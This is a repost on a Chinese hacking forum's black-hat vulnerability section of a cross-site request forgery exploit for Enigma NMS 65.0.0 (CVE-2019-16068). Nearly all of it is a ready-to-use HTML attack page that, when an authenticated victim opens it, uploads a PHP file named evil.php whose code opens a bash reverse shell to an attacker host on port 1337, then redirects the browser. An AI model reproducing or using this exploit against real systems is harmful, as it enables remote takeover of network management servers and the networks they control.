跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Enigma NMS 65.0.0 - Cross-Site Request Forgery

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF)        #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16068                                            #   
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/        -= Enigma CSRF by @xerubus =-       
|   D _]/\ \     -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    

The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.

<html>
  <script>history.pushState('', '', '/')</script>
  <script>
    function submitRequest()
    {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
      xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
      xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
      xhr.withCredentials = true;

      var body = "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"action\"\r\n" + 
        "\r\n" + 
        "system_upgrade\r\n" + 
        "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"action_aux\"\r\n" + 
        "\r\n" + 
        "upload_file_complete\r\n" + 
        "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + 
        "Content-Type: application/x-php\r\n" + 
        "\r\n" + 
        "\x3c?php\n" + 
        "\n" + 
        "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + 
        "\n" + 
        "?\x3e\n" + 
        "\r\n" + 
        "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + 
        "\r\n" + 
        "evil.php\r\n" + 
        "-----------------------------208051173310446317141640314495--\r\n";

      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
    }
    submitRequest();
    window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
  </script>
  <body onload="submitRequest();" >
  </body>
</html>

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。